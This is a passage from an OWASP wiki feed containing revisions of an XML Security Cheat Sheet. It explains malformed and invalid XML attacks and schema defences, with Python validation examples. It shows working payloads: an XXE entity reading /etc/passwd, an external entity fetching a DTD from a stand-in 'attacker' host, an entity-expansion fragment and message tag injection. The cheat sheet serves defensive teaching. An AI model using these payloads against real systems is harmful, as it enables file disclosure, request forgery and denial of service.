]&amp;gt;&lt;br /&gt;
&amp;lt;soap:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
&amp;lt;/soap:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To protect against this type of behavior, limit the number of entity expansions the parser will perform, or disable the use of inline DTD schemas altogether in your XML parsing objects. SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,” but when this type of vulnerability was discovered, certain implementations did not comply with this rule.&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and which is expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure you can clearly see what’s going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If a timeout occurs when you try to connect to a closed port (which may take one minute), while the response from an open port arrives very quickly (in one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish on higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224415</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224415"/>
				<updated>2016-12-21T18:49:40Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
= Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
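&lt;br /&gt;
A structural check of this kind can be sketched with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module. The rule in &amp;lt;tt&amp;gt;EXPECTED_CHILDREN&amp;lt;/tt&amp;gt; (exactly one &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; followed by one &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;) and the helper names are assumptions made for illustration, and the messages are built through the API to stand in for parsed requests. A real deployment would normally express the same rule in an XML schema:&lt;br /&gt;
&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# Hypothetical structural rule for the example message: exactly these
# children, each appearing once, in this order.
EXPECTED_CHILDREN = ["id", "price"]


def has_expected_structure(buy: ET.Element) -> bool:
    """Return True only if the children of buy match EXPECTED_CHILDREN exactly."""
    return buy.tag == "buy" and [child.tag for child in buy] == EXPECTED_CHILDREN


def build_message(children) -> ET.Element:
    """Build a buy element from (tag, text) pairs, standing in for a parsed request."""
    root = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(root, tag).text = text
    return root


legitimate = build_message([("id", "123"), ("price", "10")])
injected = build_message([("id", "123"), ("price", "0"), ("id", ""), ("price", "10")])

# A lookup that returns the first match picks up the attacker's price.
print(injected.find("price").text)         # 0

print(has_expected_structure(legitimate))  # True
print(has_expected_structure(injected))    # False
```
&lt;br /&gt;
Rejecting the message outright is safer than trying to decide which of the duplicated values is the legitimate one.&lt;br /&gt;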
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1,000,000 digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
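&lt;br /&gt;
The restrictions that the DTD cannot express can be sketched as an application-side check in Python. The limits below (at most three digits, digits only, a maximum value of 150) and the name &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt; are hypothetical choices for illustration; a richer schema language could enforce equivalent rules during validation:&lt;br /&gt;
&lt;br /&gt;
```python
import re

MAX_AGE_DIGITS = 3                       # hypothetical upper bound on length
AGE_PATTERN = re.compile(r"[0-9]{1,3}")  # digits only, at most three of them
MAX_AGE = 150                            # hypothetical upper bound on the value


def is_valid_age(text: str) -> bool:
    """Apply length, character-set and range limits to an age value."""
    if len(text) > MAX_AGE_DIGITS:
        return False                     # reject oversized input before parsing it
    if AGE_PATTERN.fullmatch(text) is None:
        return False                     # reject anything that is not plain digits
    return MAX_AGE >= int(text)


print(is_valid_age("42"))
print(is_valid_age("1" * 1_000_000))
```
&lt;br /&gt;
Checking the length first means the one-million-digit value is discarded without ever being converted to a number.&lt;br /&gt;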
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially enforced for the element, which suggests that the information is checked by application code instead of being validated against the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might produce a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
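&lt;br /&gt;
The logical flaw can be reproduced in a few lines of Python. This is a minimal sketch, assuming the application computes the total as described; the function name &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; is hypothetical, and the guard mirrors what a positive integer type would enforce at validation time:&lt;br /&gt;
&lt;br /&gt;
```python
from decimal import Decimal


def order_total(price: str, quantity: str) -> Decimal:
    """Compute price*quantity, accepting only quantities of one or more."""
    units = int(quantity)
    if 1 > units:
        raise ValueError("quantity must be a positive integer")
    return Decimal(price) * units


# With a plain integer type, the attacker's value passes validation
# and the multiplication yields a negative total.
print(Decimal("10") * int("-1"))

# With the guard in place, only positive quantities reach the calculation.
print(order_total("10", "1"))
```
&lt;br /&gt;
Calling &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; with a quantity of -1 or 0 raises &amp;lt;tt&amp;gt;ValueError&amp;lt;/tt&amp;gt; instead of producing a credit.&lt;br /&gt;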
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used to express only real numbers such as prices. This is a common error also seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Because Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not valid decimal values, a price set to either of them is rejected during validation instead of reaching the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
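&lt;br /&gt;
The effect of the special values on application code can be sketched in Python. The function name &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is hypothetical. Note that Python's &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; constructor, unlike the XML Schema decimal type, also accepts these strings, so this sketch adds an explicit finiteness check:&lt;br /&gt;
&lt;br /&gt;
```python
import math
from decimal import Decimal, InvalidOperation


def parse_price(text: str) -> Decimal:
    """Parse a price, rejecting NaN and the infinities."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError("not a number: " + repr(text))
    if not value.is_finite():
        raise ValueError("special value not allowed: " + repr(text))
    return value


# A float-typed price accepts the special values, and they propagate
# silently through later arithmetic.
total = float("INF") * 2
print(math.isinf(total))         # True
print(math.isnan(float("NaN")))  # True

print(parse_price("19.99"))
```
&lt;br /&gt;
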